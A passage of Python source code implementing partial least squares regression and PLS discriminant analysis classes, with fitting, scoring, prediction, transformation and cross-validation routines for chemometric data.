"""
fit the model to get all model coff and scores and get the goodness of the fit R2X and R2Y
:param x: data metrix to be fit
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:param y: depentent variable or target variable
:type y: list or 1d array
:raise ValueError: If any problem occurs during fitting.
"""
try:
x = np.array(x)
# reshape Y by addding extra dimentien (requiremnt for PLS regression fitting )
if y.ndim == 1:
y = y.reshape(-1, 1)
# reshape Y by addding extra dimentien (requiremnt for PLS regression fitting )
if x.ndim == 1:
x = x.reshape(-1, 1)
# scaler x if scaler is provided
if self.x_scaler == None:
xscaled = x
else:
xscaled = self.x_scaler.fit_transform(x)
yscaled = self.y_scaler.fit_transform(y)
# fit sklearn PLS regresion model to xscaled an y data
self.pls_algorithm.fit(xscaled, yscaled)
# Expose the model parameters
self.loadings_p = self.pls_algorithm.x_loadings_
self.loadings_q = self.pls_algorithm.y_loadings_
self.weights_w = self.pls_algorithm.x_weights_
self.weights_c = self.pls_algorithm.y_weights_
self.rotations_ws = self.pls_algorithm.x_rotations_
# calclulate rotation from weights and loading
self.rotations_cs = np.dot(np.linalg.pinv(np.dot(self.weights_c, self.loadings_q.T)), self.weights_c)
self.scores_t = self.pls_algorithm.x_scores_
self.scores_u = self.pls_algorithm.y_scores_
# calculate beta from scores T and U
self.b_u = np.dot(np.dot(np.linalg.pinv(np.dot(self.scores_u.T, self.scores_u)), self.scores_u.T),
self.scores_t)
self.b_t = np.dot(np.dot(np.linalg.pinv(np.dot(self.scores_t.T, self.scores_t)), self.scores_t.T),
self.scores_u)
self.beta_coeffs = self.pls_algorithm.coef_
# save that the model is fitted
self.isfitted = True
# get R2X and R2Y by calling score funtion
R2Y = PyPLS.score(self, x=x, y=y, block_to_score='y')
R2X = PyPLS.score(self, x=x, y=y, block_to_score='x')
# get SSY SSX and composed SSX adn composed SSY
cm_fit = self.cummulativefit(x, y)
self.m_params = {'R2Y': R2Y, 'R2X': R2X, 'SSX': cm_fit['SSX'], 'SSY': cm_fit['SSY'],
'SSXcomp': cm_fit['SSXcomp'], 'SSYcomp': cm_fit['SSYcomp']}
# calculate the sum of squares
resid_ssx = self._residual_ssx(x)
s0 = np.sqrt(resid_ssx.sum() / ((self.scores_t.shape[0] - self.ncomps - 1) * (x.shape[1] - self.ncomps)))
self.m_params['S0X'] = s0
except ValueError as verr:
raise
def score(self, x, y, block_to_score='y', sample_weight=None):
"""
funtion to calculate R2X and R2Y
:param x: data metrix to be fit
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:param y: target variable
:type y: list or 1d array
:param str block_to_score: shose if we want to calculate R2X or R2Y defaults to 'y'
:type str
:param sample_weight: Optional sample weights to use in scoring defaults to None
:return R2Y: by predicting Y from X wr get R2Y
:return R2X: by predicting X from Y we get R2X
:rtype float
:raise ValueError: If block to score argument is not acceptable or date mismatch issues with the provided data.
"""
try:
if block_to_score not in ['x', 'y']:
raise ValueError("x or y are the only accepted values for block_to_score")
# reshape Y by addding extra dimentien (requiremnt for PLS regression fitting )
if y.ndim == 1:
y = y.reshape(-1, 1)
# reshape Y by addding extra dimentien (requiremnt for PLS regression fitting )
if x.ndim == 1:
x = x.reshape(-1, 1)
# calculate R2Y
if block_to_score == 'y':
yscaled = deepcopy(self.y_scaler).fit_transform(y)
tssy = np.sum(np.square(yscaled)) # total sum of squares
ypred = self.y_scaler.transform(PyPLS.predict(self, x, y=None)) # prediction of Y from X
rssy = np.sum(np.square(yscaled - ypred)) # resudual sum of squres
R2Y = 1 - (rssy / tssy)
return R2Y
# calculate R2X
else:
if self.x_scaler == None:
xscaled = x
else:
xscaled = deepcopy(self.x_scaler).fit_transform(x) # scale X
# Calculate total sum of squares of X and Y for R2X and R2Y calculation
xpred = self.x_scaler.transform(PyPLS.predict(self, x=None, y=y))
tssx = np.sum(np.square(xscaled)) # total sum of squres
rssx = np.sum(np.square(xscaled - xpred)) # resuadual sum of squares "
R2X = 1 - (rssx / tssx)
return R2X
except ValueError as verr:
raise verr
def predict(self, x=None, y=None):
"""
predict y from X or X from Y
:param x: data metrix to be fit defaults to None
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:param y: target variable defaults to None
:type y: list or 1d array
:return: Predicted data block (X or Y) obtained from the other data block.
:rtype: numpy.ndarray, shape [n_samples]
:raise ValueError: If no data matrix is passed, or dimensions mismatch issues with the provided data.
:raise AttributeError: Calling the method without fitting the model before.
"""
try:
# check if the odel is fitted or not
if self.isfitted is True:
if (x is not None) and (y is not None):
raise ValueError('target variable or predictive variable must be None ')
# If nothing is passed at all, complain and do nothing
elif (x is None) and (y is None):
raise ('both predictive and target variable are None ')
# Predict Y from X
elif x is not None:
if x.ndim == 1:
x = x.reshape(-1, 1)
# sclae X if sclaer is provided
if self.x_scaler == None:
xscaled = x
else:
xscaled = self.x_scaler.fit_transform(x)
# Using Betas to predict Y directly
predicted = np.dot(xscaled, self.beta_coeffs)
if predicted.ndim == 1:
predicted = predicted.reshape(-1, 1)
predicted = self.y_scaler.inverse_transform(predicted)
return predicted
# Predict X from Y
elif y is not None:
# Going through calculation of U and then X = Ub_uW'
u_scores = PyPLS.transform(self, x=None, y=y)
predicted = np.dot(np.dot(u_scores, self.b_u), self.weights_w.T)
if predicted.ndim == 1:
predicted = predicted.reshape(-1, 1)
predicted = self.x_scaler.inverse_transform(predicted)
return predicted
else:
raise AttributeError("Model is not fitted")
except ValueError as verr:
raise verr
except AttributeError as atter:
raise atter
def transform(self, x=None, y=None):
"""
calculate U or T metrix equivalent to sklearn TransformeMixin
:param x: data metrix to be fit defaults to None
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:param y: target variable defaults to None
:type y: list or 1d array
:return: Latent Variable scores (T) for the X matrix and for the Y vector/matrix (U).
:rtype: tuple with 2 numpy.ndarray, shape (n_samples, n_comps)
:raise ValueError: If dimensions of input data are mismatched.
:raise AttributeError: When calling the method before the model is fitted.
"""
try:
# Check if model is fitted
if self.isfitted is True:
if (x is not None) and (y is not None):
raise ValueError('target variable or predictive variable must be None ')
# If nothing is passed at all, complain and do nothing
elif (x is None) and (y is None):
raise ('both predictive and target variable are None ')
# If Y is given, return U
elif x is None:
# reshape y by adding extra dimetion if y is a vector
if y.ndim == 1:
y = y.reshape(-1, 1)
yscaled = self.y_scaler.transform(y)
U = np.dot(yscaled, self.rotations_cs)
return U
# If X is given, return T
elif y is None:
# reshape x by adding extra dimention if its a vector
if x.ndim == 1:
x = x.reshape(-1, 1)
xscaled = self.x_scaler.transform(x)
T = np.dot(xscaled, self.rotations_ws)
return T
else:
raise AttributeError('Model not fitted')
except ValueError as verr:
raise verr
except AttributeError as atter:
raise atter
def cummulativefit(self, x, y):
"""
calculate the commitative sum of squares
:param x: data metrix to be fit
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:param y: target variable
:type y: list or 1d array
:return: dictionary object containing the total Regression Sum of Squares and the Sum of Squares
:rtype: dict
per components, for both the X and Y data blocks.
"""
# reshape y if number of dimention is 1
if y.ndim == 1:
y = y.reshape(-1, 1)
# reshapeX if number of dimention is 1
if x.ndim == 1:
x = x.reshape(-1, 1)
# verifiy the model is fitted or not
if self.isfitted is False:
raise AttributeError('fit model first')
if self.x_scaler == None:
xscaled = x
else:
xscaled = self.x_scaler.fit_transform(x)
yscaled = self.y_scaler.transform(y)
# Obtain residual sum of squares for whole data set and per component
SSX = np.sum(np.square(xscaled)) # sum of squres of predictve variables
SSY = np.sum(np.square(yscaled)) # sum of squares of target variable
ssx_comp = list()
ssy_comp = list()
# calculate sum of squres for each component
for curr_comp in range(1, self.ncomps + 1):
model = self._reduce_ncomps(curr_comp)
ypred = PyPLS.predict(model, x, y=None)
xpred = self.x_scaler.transform(PyPLS.predict(model, x=None, y=y))
rssy = np.sum(np.square(y - ypred))
rssx = np.sum(np.square(xscaled - xpred))
ssx_comp.append(rssx)
ssy_comp.append(rssy)
# save the result
cumulative_fit = {'SSX': SSX, 'SSY': SSY, 'SSXcomp': np.array(ssx_comp), 'SSYcomp': np.array(ssy_comp)}
return cumulative_fit
def _reduce_ncomps(self, n__comps):
"""
get a semilar model with reduced number of componants
:param int n__comps: number of componants
:type int
:return PyPLS object with reduced number of components.
:rtype: PyPLS instance
:raise ValueError: If number of components desired is larger than original number of components
:raise AttributeError: If model is not fitted.
"""
try:
# raise error if number of componat of the new model is bigger that the original
if n__comps > self.ncomps:
raise ValueError('Fit a new model with more components instead')
# verify that the model is fitted or not
if self.isfitted is False:
raise AttributeError('Model not Fitted')
# get the new model variable
newmodel = deepcopy(self)
newmodel.ncomps = n__comps
newmodel.modelParameters = None
newmodel.cvParameters = None
newmodel.loadings_p = self.loadings_p[:, 0:n__comps]
newmodel.weights_w = self.weights_w[:, 0:n__comps]
newmodel.weights_c = self.weights_c[:, 0:n__comps]
newmodel.loadings_q = self.loadings_q[:, 0:n__comps]
newmodel.rotations_ws = self.rotations_ws[:, 0:n__comps]
newmodel.rotations_cs = self.rotations_cs[:, 0:n__comps]
newmodel.scores_t = None
newmodel.scores_u = None
newmodel.b_t = self.b_t[0:n__comps, 0:n__comps]
newmodel.b_u = self.b_u[0:n__comps, 0:n__comps]
# These have to be recalculated from the rotations
newmodel.beta_coeffs = np.dot(newmodel.rotations_ws, newmodel.loadings_q.T)
return newmodel
except ValueError as verr:
raise verr
except AttributeError as atter:
raise atter
def inverse_transform(self, t=None, u=None):
"""
inverse transorm of the : genrate x and y from U and T scores
:param t: T scores corresponding to the X data matrix.
:param u: Y scores corresponding to the Y data vector/matrix.
:return x: data metrix to be fit (rows : samples , columns : variables )
:return y: target variable
:rtype: numpy.ndarray, shape [n_samples, n_features] or None
:raise ValueError: If dimensions of input data are mismatched.
"""
try:
# check if the model is fitted o not
if self.isfitted is True:
if t is not None and u is not None:
raise ValueError('u or t must be None')
elif t is None and u is None:
raise ValueError('both variable are None ')
elif t is not None:
# get the prdcition from t and the transpose of p_loadings
xpred = np.dot(t, self.loadings_p.T)
if self.x_scaler is not None:
xscaled = self.x_scaler.inverse_transform(xpred)
else:
xscaled = xpred
return xscaled
# If U is given, return T
elif u is not None:
# get the prediction from u and q loadings transpose
ypred = np.dot(u, self.loadings_q.T)
yscaled = self.y_scaler.inverse_transform(ypred)
return yscaled
except ValueError as verr:
raise verr
def _residual_ssx(self, x):
"""
calculate the resudua sum of squres
:param x: Data matrix
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:return: The residual Sum of Squares per sample
:rtype float
"""
# transorm x to laten variables
pred_scores = self.transform(x)
# transform the latent variables back to original space
x_reconstructed = self.x_scaler.transform(self.inverse_transform(pred_scores))
# scale x if scaler is provided
if self.x_scaler == None:
xscaled = x
else:
xscaled = self.x_scaler.fit_transform(x)
# calculate the resudual
residuals = np.sum(np.square(xscaled - x_reconstructed), axis=1)
return residuals
############################################################
class PyPLS_DA(PyPLS, ClassifierMixin):
"""
PyPLS_DA object -Function to perform standard Partial Least Squares regression to classify samples.
plsda function fit PLS models with 1,...,ncomp components to the factor or class vector Y. The appropriate indicator matrix is created.
standar scaler or any other scaling technqiue is applyed as internal pre-processing step
See:
- Indhal et. al., From dummy regression to prior probabilities in PLS-DA, Journal of Chemometrics, 2007
- Barker, Matthew, <NAME>, Partial least squares for discrimination, Journal of Chemometrics, 2003
- Brereton, <NAME>, <NAME>., Partial least squares discriminant analysis: Taking the magic away,
Journal of Chemometrics, 2014
Model performance metrics employed are the Q2Y , Area under the curve and ROC curves, f1 measure, balanced accuracy,
precision, recall, confusion matrices and 0-1 loss.
:param scores_t: projection of X (default None )
:type scores_t: data matrix
:param scores_u: projection of Y (default None)
:type scores_u: data matrix
:param isfitted: indicate if the model is fitted or not (default None )
:type isfitted: bool
:param weights_w: maximum covariance of X with Y (default None )
:type weights_w: data matrix
:param loadings_p: loading of model simelar to PCA loading assosiated with T to X(default None )
:type loadings_p : data matrix
:param loadings_q: loading of model simelar to PCA loading assosiated with U to Y (default None )
:type loadings_q: data matrix
:param rotations_ws: the rotation of X in the latin variable space (default None )
:type rotations_ws: data matrix
:param rotations_cs: the rotation of Y in the latin variable space (default None )
:type rotations_cs: data matrix
:param b_u: the beta from regration T on U (default None )
:type b_u: data matrix
:param b_t: the beta from regration U on T (default None )
:type b_t: data matrix
:param ncomps: number of component (laltent variables ) (default 2 )
:type ncomps: int
:param beta_coeffs: the cofficients of PLS regression model (default None )
:type beta_coeffs: data matrix
:param x_scaler:used on independent variables X (default None )
:type x_scaler:sklearn sclaer
:param y_scaler: used on target variable Y(default None )
:type y_scaler: sklearn sclaer
:param m_params: the parmas of model after fitting
:type m_params: dict
:param cvParameters: the parmas of model after after cross validation like Q2
:type cvParameters: dict
:param n_classes: the parmas of model after fitting
:type n_classes: int
:param m_params: number of classes in target variable
:type m_params: dict
"""
def __init__(self, ncomps=2, xscaler=StandardScaler()):
"""Constructor method
"""
pls_algorithm = PLSRegression(ncomps, scale=False)
try:
# chek if the providede scaler is sklearn scaler or not
assert isinstance(xscaler,
TransformerMixin) or xscaler is None, "sclaler must be an sklearn transformer-like or None"
self.pls_algorithm = pls_algorithm
# set model variable most of them are set now to None because they get change when fitting the model
self.scores_t = None # projection of X
self.scores_u = None # projection of Y
self.weights_w = None # maximum covariance of X with Y
self.weights_c = None # maximum covariance
self.loadings_p = None # loading of model simelar to PCA loading assosiated with T to X
self.loadings_q = None # loading of model simelar to PCA loading assosiated with U to Y
self.rotations_ws = None # the rotation of X in the latin variable space
self.rotations_cs = None # the rotation of Y in the latin variable space
self.b_u = None # the beta from regration T on U
self.b_t = None # the beta from regression U on T
self.beta_coeffs = None # the cofficients of PLS regression model
self.n_classes = None # number of distanct classes in target variable
self.class_means = None
self.ncomps = ncomps # number of component (altent variablels )
self.x_scaler = xscaler # scaler used on independent ariables X
self.y_scaler = StandardScaler(with_std=False) # scaler used on dependent ariables Y
self.cvParameters = None # cross validation params
self.m_params = None # model params
self.isfitted = False # boolien variable to indicate that model is fitted
except TypeError as ter:
print(ter.args[0])
raise ter
def fit(self, x, y, ):
"""
Fit model to data (x and y)
:param x:array-like of shape
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:param y: atrget variable
:type y: list or 1d array
:raise ValueError: If any problem occurs during fitting.
"""
try:
# reshape x if number of dimentions equal to 1 by adding extra dimention
if x.ndim == 1:
x = x.reshape(-1, 1)
# if scaler is not None scale x
if self.x_scaler == None:
xscaled = x
else:
xscaled = self.x_scaler.fit_transform(x)
# get the nymber of classes
n_classes = np.unique(y).size
self.n_classes = n_classes
# create a dummy metrix if number of classes exited 2
if self.n_classes > 2:
dummy_mat = pd.get_dummies(y).values
y_scaled = self.y_scaler.fit_transform(dummy_mat)
else:
# if number of dimensions equal to 1 add extra dim
if y.ndim == 1:
y = y.reshape(-1, 1)
y_scaled = self.y_scaler.fit_transform(y)
# fit PLS regression model
self.pls_algorithm.fit(xscaled, y_scaled)
# get the model params from the fitted PLS model
self.loadings_p = self.pls_algorithm.x_loadings_
self.loadings_q = self.pls_algorithm.y_loadings_
self.weights_w = self.pls_algorithm.x_weights_
self.weights_c = self.pls_algorithm.y_weights_
self.rotations_ws = self.pls_algorithm.x_rotations_
# calculate rotation and beta variable using loading and weight of PLS model
self.rotations_cs = np.dot(np.linalg.pinv(np.dot(self.weights_c, self.loadings_q.T)), self.weights_c)
self.scores_t = self.pls_algorithm.x_scores_
self.scores_u = self.pls_algorithm.y_scores_
self.b_u = np.dot(np.dot(np.linalg.pinv(np.dot(self.scores_u.T, self.scores_u)), self.scores_u.T),
self.scores_t)
self.b_t = np.dot(np.dot(np.linalg.pinv(np.dot(self.scores_t.T, self.scores_t)), self.scores_t.T),
self.scores_u)
self.beta_coeffs = self.pls_algorithm.coef_
# create class mean matrix based on obtained T score
self.class_means = np.zeros((n_classes, self.ncomps))
for curr_class in range(self.n_classes):
curr_class_idx = np.where(y == curr_class)
self.class_means[curr_class, :] = np.mean(self.scores_t[curr_class_idx])
# save that the model is fitted
self.isfitted = True
# calculate R2X and R2Y in both cases binery and non binery classification
if self.n_classes > 2:
R2Y = PyPLS.score(self, x=x, y=dummy_mat, block_to_score='y')
R2X = PyPLS.score(self, x=x, y=dummy_mat, block_to_score='x')
else:
R2Y = PyPLS.score(self, x=x, y=y, block_to_score='y')
R2X = PyPLS.score(self, x=x, y=y, block_to_score='x')
# constant grid for ROC
fpr_grid = np.linspace(0, 1, num=20)
# get class scores
class_score = PyPLS.predict(self, x=x)
# binery classification
if n_classes == 2:
y_pred = self.predict(x)
accuracy = metrics.accuracy_score(y, y_pred)
precision = metrics.precision_score(y, y_pred)
recall = metrics.recall_score(y, y_pred)
misclassified_samples = np.where(y.ravel() != y_pred.ravel())[0]
f1_score = metrics.f1_score(y, y_pred)
conf_matrix = metrics.confusion_matrix(y, y_pred)
zero_oneloss = metrics.zero_one_loss(y, y_pred)
matthews_mcc = metrics.matthews_corrcoef(y, y_pred)
# Interpolated ROC curve and AUC
roc_curve = metrics.roc_curve(y, class_score.ravel())
tpr = roc_curve[1]
fpr = roc_curve[0]
interpolated_tpr = np.zeros_like(fpr_grid)
interpolated_tpr += interp(fpr_grid, fpr, tpr)
roc_curve = (fpr_grid, interpolated_tpr, roc_curve[2])
auc_area = metrics.auc(fpr_grid, interpolated_tpr)
else:
# multi class classification
y_pred = self.predict(x)
accuracy = metrics.accuracy_score(y, y_pred)
precision = metrics.precision_score(y, y_pred, average='weighted')
recall = metrics.recall_score(y, y_pred, average='weighted')
misclassified_samples = np.where(y.ravel() != y_pred.ravel())[0]
f1_score = metrics.f1_score(y, y_pred, average='weighted')
conf_matrix = metrics.confusion_matrix(y, y_pred)
zero_oneloss = metrics.zero_one_loss(y, y_pred)
matthews_mcc = np.nan
roc_curve = list()
auc_area = list()
# Generate multiple ROC curves - one for each class the multiple class case
for predclass in range(self.n_classes):
current_roc = metrics.roc_curve(y, class_score[:, predclass], pos_label=predclass)
# Interpolate all ROC curves to a finite grid
# Makes it easier to average and compare multiple models - with CV in mind
tpr = current_roc[1]
fpr = current_roc[0]
interpolated_tpr = np.zeros_like(fpr_grid)
interpolated_tpr += interp(fpr_grid, fpr, tpr)
roc_curve.append([fpr_grid, interpolated_tpr, current_roc[2]])
auc_area.append(metrics.auc(fpr_grid, interpolated_tpr))
# Obtain residual sum of squares for whole data set and per component
# Same as Chemometrics PLS, this is so we can use VIP's and other metrics as usual
if self.n_classes > 2:
cm_fit = self.cummulativefit(x, dummy_mat)
else:
cm_fit = self.cummulativefit(x, y)
# save the model params
self.m_params = {'PLS': {'R2Y': R2Y, 'R2X': R2X, 'SSX': cm_fit['SSX'], 'SSY': cm_fit['SSY'],
'SSXcomp': cm_fit['SSXcomp'], 'SSYcomp': cm_fit['SSYcomp']},
'DA': {'Accuracy': accuracy, 'AUC': auc_area,
'ConfusionMatrix': conf_matrix, 'ROC': roc_curve,
'MisclassifiedSamples': misclassified_samples,
'Precision': precision, 'Recall': recall,
'F1': f1_score, '0-1Loss': zero_oneloss, 'MatthewsMCC': matthews_mcc,
'ClassPredictions': y_pred}}
except ValueError as verr:
raise verr
def score(self, x, y, sample_weight=None):
"""
Predict and calculate the R2 for the model using one of the data blocks (X or Y) provided.
Equivalent to the scikit-learn ClassifierMixin score method.
:param x: Data matrix to fit the PLS model.
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:param y: target variable
:type y: list or 1d array
:param str block_to_score: Which of the data blocks (X or Y) to calculate the R2 goodness of fit.
:param sample_weight: Optional sample weights to use in scoring.
:type sample_weight: numpy.ndarray, shape [n_samples] or None defaults to None
:return R2Y: The model's R2Y, calculated by predicting Y from X and scoring.
:rtype: float
:return R2X: The model's R2X, calculated by predicting X from Y and scoring.
:rtype: float
:raise ValueError: If block to score argument is not acceptable or date mismatch issues with the provided data.
"""
try:
# return metrics.accuracy_score(y, self.predict(x), sample_weight=sample_weight)
return PyPLS.score(self, x, y, block_to_score='x')
except ValueError as verr:
raise verr
def predict(self, x):
"""
predict the value of the target variable based on predictive variable x
:param x: data metrix to be fit
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:param y: target variable
:type y: list or 1d array
:return: Predicted data block Y by as discret values using argmin
:rtype: numpy.ndarray, shape (n_samples, n_features)
:raise ValueError: If no data matrix is passed, or dimensions mismatch issues with the provided data.
:raise AttributeError: Calling the method without fitting the model before.
"""
try:
if self.isfitted is False:
raise AttributeError("Model is not fitted")
# based on original encoding as 0, 1 (binery classification )
if self.n_classes == 2:
y_pred = PyPLS.predict(self, x)
class_pred = np.argmin(np.abs(y_pred - np.array([0, 1])), axis=1)
else:
# multiclass classification
pred_scores = self.transform(x=x)
# encode the predicted variable
closest_class_mean = lambda x: np.argmin(np.linalg.norm((x - self.class_means), axis=1))
class_pred = np.apply_along_axis(closest_class_mean, axis=1, arr=pred_scores)
return class_pred
except ValueError as verr:
raise verr
except AttributeError as atter:
raise atter
def inverse_transform(self, t=None, u=None):
"""
transform T and U scores to get X and Y
:param t: T scores corresponding to the X data matrix. defaults to None
:type numpy array
:param u: Y scores corresponding to the Y data vector/matrix defaults to None
:type numpy array
:return x: data metrix to be fit (rows : samples , columns : variables )
:return y: depentent variable or target variable
:rtype: numpy.ndarray, shape (n_samples, n_features) or None
:raise ValueError: If dimensions of input data are mismatched.
"""
try:
if self.isfitted is True:
if t is not None and u is not None:
raise ValueError('T or U scores must be set to None ')
elif t is None and u is None:
raise ValueError('T and U cant be both None ')
# If T is given, return U
elif t is not None:
# calculate x prediction
xpred = np.dot(t, self.loadings_p.T)
if self.x_scaler is not None:
xscaled = self.x_scaler.inverse_transform(xpred)
else:
xscaled = xpred
return xscaled
# If U is given, return T
elif u is not None:
# calculate y bases on loading transpose
ypred = np.dot(u, self.loadings_q.T)
return ypred
except ValueError as verr:
raise verr
def transform(self, x=None, y=None):
"""
calculate U or T metrix equivalent to sklearn TransformeMixin
:param x: data metrix to be fit
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:param y: target variable
:type y: list or 1d array
:return: Latent Variable scores (T) for the X matrix and for the Y vector/matrix (U).
:rtype: tuple with 2 numpy.ndarray, shape (n_samples, n_comps)
:raise ValueError: If dimensions of input data are mismatched.
:raise AttributeError: When calling the method before the model is fitted.
"""
try:
# Check if model is fitted or not
if self.isfitted is True:
# If X and Y are passed, complain and do nothing
if (x is not None) and (y is not None):
raise ValueError('one of the variable must be None')
# If nothing is passed at all, complain and do nothing
elif (x is None) and (y is None):
raise ValueError('both variables are set to None')
# If Y is given, return U
elif x is None:
# verify that y is a single vector
if y.ndim != 1:
raise TypeError('Please supply a dummy vector with integer as class membership')
# muticlass classification
if self.n_classes > 2:
y = self.y_scaler.transform(pd.get_dummies(y).values)
else:
# binery classification
if y.ndim == 1:
y = y.reshape(-1, 1)
y = self.y_scaler.transform(y)
U = np.dot(y, self.rotations_cs)
return U
# If X is given, return T
elif y is None:
# add extra dimention to x if its a vector
if x.ndim == 1:
x = x.reshape(-1, 1)
if self.x_scaler == None:
xscaled = x
else:
xscaled = self.x_scaler.fit_transform(x)
T = np.dot(xscaled, self.rotations_ws)
return T
else:
raise AttributeError('Model not fitted yet ')
except ValueError as verr:
raise verr
except AttributeError as atter:
raise atter
def cross_validation(self, x, y, cv_method=KFold(7, shuffle=True), outputdist=False,
):
"""
cross validation result of the model and calculate Q2
:param x: data metrix to be fit
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:param y: target varibale
:type y: list or 1d array
:param cv_method: cross valiation method
:param bool outputdist: Output the whole distribution for. Useful when ShuffleSplit or CrossValidators other than KFold defaults to false
:return: dict of cross validation scores
:rtype dict
:raise TypeError: If the cv_method passed is not a scikit-learn CrossValidator object.
:raise ValueError: If the x and y data matrices are invalid.
"""
try:
# Check if global model is fitted... and if not, fit it using all of X
if self.isfitted is False:
self.fit(x, y)
# Make a copy of the object, to ensure the internal state of the object is not modified during
# the cross_validation method call
cv_pipeline = deepcopy(self)
# Number of splits
ncvrounds = cv_method.get_n_splits()
# Number of classes to select tell binary from multi-class discrimination parameter calculation
n_classes = np.unique(y).size
if x.ndim > 1:
x_nvars = x.shape[1]
else:
x_nvars = 1
# The y variable expected is a single vector with ints as class label - binary
# and multiclass classification are allowed but not multilabel so this will work.
# but for the PLS part in case of more than 2 classes a dummy matrix is constructed and kept separately
# throughout
if y.ndim == 1:
# y = y.reshape(-1, 1)
if self.n_classes > 2:
y_pls = pd.get_dummies(y).values
y_nvars = y_pls.shape[1]
else:
y_nvars = 1
y_pls = y
else:
raise TypeError('Please supply a dummy vector with integer as class membership')
# Initialize list structures to contain the fit
cv_loadings_p = np.zeros((ncvrounds, x_nvars, self.ncomps))
cv_loadings_q = np.zeros((ncvrounds, y_nvars, self.ncomps))
cv_weights_w = np.zeros((ncvrounds, x_nvars, self.ncomps))
cv_weights_c = np.zeros((ncvrounds, y_nvars, self.ncomps))
cv_train_scores_t = list()
cv_train_scores_u = list()
# CV test scores more informative for ShuffleSplit than KFold but kept here anyway
cv_test_scores_t = list()
cv_test_scores_u = list()
cv_rotations_ws = np.zeros((ncvrounds, x_nvars, self.ncomps))
cv_rotations_cs = np.zeros((ncvrounds, y_nvars, self.ncomps))
cv_betacoefs = np.zeros((ncvrounds, y_nvars, x_nvars))
cv_vipsw = np.zeros((ncvrounds, x_nvars))
cv_trainprecision = np.zeros(ncvrounds)
cv_trainrecall = np.zeros(ncvrounds)
cv_trainaccuracy = np.zeros(ncvrounds)
cv_trainauc = np.zeros((ncvrounds, y_nvars))
cv_trainmatthews_mcc = np.zeros(ncvrounds)
cv_trainzerooneloss = np.zeros(ncvrounds)
cv_trainf1 = np.zeros(ncvrounds)
cv_trainclasspredictions = list()
cv_trainroc_curve = list()
cv_trainconfusionmatrix = list()
cv_trainmisclassifiedsamples = list()
cv_testprecision = np.zeros(ncvrounds)
cv_testrecall = np.zeros(ncvrounds)
cv_testaccuracy = np.zeros(ncvrounds)
cv_testauc = np.zeros((ncvrounds, y_nvars))
cv_testmatthews_mcc = np.zeros(ncvrounds)
cv_testzerooneloss = np.zeros(ncvrounds)
cv_testf1 = np.zeros(ncvrounds)
cv_testclasspredictions = list()
cv_testroc_curve = list()
cv_testconfusionmatrix = list()
cv_testmisclassifiedsamples = list()
# Initialise predictive residual sum of squares variable (for whole CV routine)
pressy = 0
pressx = 0
# Calculate Sum of Squares SS in whole dataset for future calculations
ssx = np.sum(np.square(cv_pipeline.x_scaler.fit_transform(x)))
ssy = np.sum(np.square(cv_pipeline.y_scaler.fit_transform(y_pls.reshape(-1, 1))))
# As assessed in the test set..., opposed to PRESS
R2X_training = np.zeros(ncvrounds)
R2Y_training = np.zeros(ncvrounds)
# R2X and R2Y assessed in the test set
R2X_test = np.zeros(ncvrounds)
R2Y_test = np.zeros(ncvrounds)
x = np.array(x)
for cvround, train_testidx in enumerate(cv_method.split(x, y)):
# split the data explicitly
train = train_testidx[0]
test = train_testidx[1]
# Check dimensions for the indexing
ytrain = y[train]
ytest = y[test]
if x_nvars == 1:
xtrain = x[train]
xtest = x[test]
else:
xtrain = x[train, :]
xtest = x[test, :]
cv_pipeline.fit(xtrain, ytrain)
# Prepare the scaled X and Y test data
# Comply with the sklearn scaler behaviour
if xtest.ndim == 1:
xtest = xtest.reshape(-1, 1)
xtrain = xtrain.reshape(-1, 1)
# Fit the training data
xtest_scaled = cv_pipeline.x_scaler.transform(xtest)
R2X_training[cvround] = PyPLS.score(cv_pipeline, xtrain, ytrain, 'x')
R2Y_training[cvround] = PyPLS.score(cv_pipeline, xtrain, ytrain, 'y')
if y_pls.ndim > 1:
yplstest = y_pls[test, :]
else:
yplstest = y_pls[test].reshape(-1, 1)
# Use super here for Q2
ypred = PyPLS.predict(cv_pipeline, x=xtest, y=None)
xpred = PyPLS.predict(cv_pipeline, x=None, y=ytest)
xpred = cv_pipeline.x_scaler.transform(xpred).squeeze()
ypred = cv_pipeline.y_scaler.transform(ypred).squeeze()
curr_pressx = np.sum(np.square(xtest_scaled - xpred))
curr_pressy = np.sum(np.square(cv_pipeline.y_scaler.transform(yplstest).squeeze() - ypred))
R2X_test[cvround] = PyPLS.score(cv_pipeline, xtest, yplstest, 'x')
R2Y_test[cvround] = PyPLS.score(cv_pipeline, xtest, yplstest, 'y')
pressx += curr_pressx
pressy += curr_pressy
cv_loadings_p[cvround, :, :] = cv_pipeline.loadings_p
cv_loadings_q[cvround, :, :] = cv_pipeline.loadings_q
cv_weights_w[cvround, :, :] = cv_pipeline.weights_w
cv_weights_c[cvround, :, :] = cv_pipeline.weights_c
cv_rotations_ws[cvround, :, :] = cv_pipeline.rotations_ws
cv_rotations_cs[cvround, :, :] = cv_pipeline.rotations_cs
cv_betacoefs[cvround, :, :] = cv_pipeline.beta_coeffs.T
cv_vipsw[cvround, :] = cv_pipeline.VIP()
# Training metrics
cv_trainaccuracy[cvround] = cv_pipeline.m_params['DA']['Accuracy']
cv_trainprecision[cvround] = cv_pipeline.m_params['DA']['Precision']
cv_trainrecall[cvround] = cv_pipeline.m_params['DA']['Recall']
cv_trainauc[cvround, :] = cv_pipeline.m_params['DA']['AUC']
cv_trainf1[cvround] = cv_pipeline.m_params['DA']['F1']
cv_trainmatthews_mcc[cvround] = cv_pipeline.m_params['DA']['MatthewsMCC']
cv_trainzerooneloss[cvround] = cv_pipeline.m_params['DA']['0-1Loss']
# Check this indexes, same as CV scores
cv_trainmisclassifiedsamples.append(
train[cv_pipeline.m_params['DA']['MisclassifiedSamples']])
cv_trainclasspredictions.append(
[*zip(train, cv_pipeline.m_params['DA']['ClassPredictions'])])
cv_trainroc_curve.append(cv_pipeline.m_params['DA']['ROC'])
fpr_grid = np.linspace(0, 1, num=20)
y_pred = cv_pipeline.predict(xtest)
# Obtain the class score
class_score = PyPLS.predict(cv_pipeline, xtest)
if n_classes == 2:
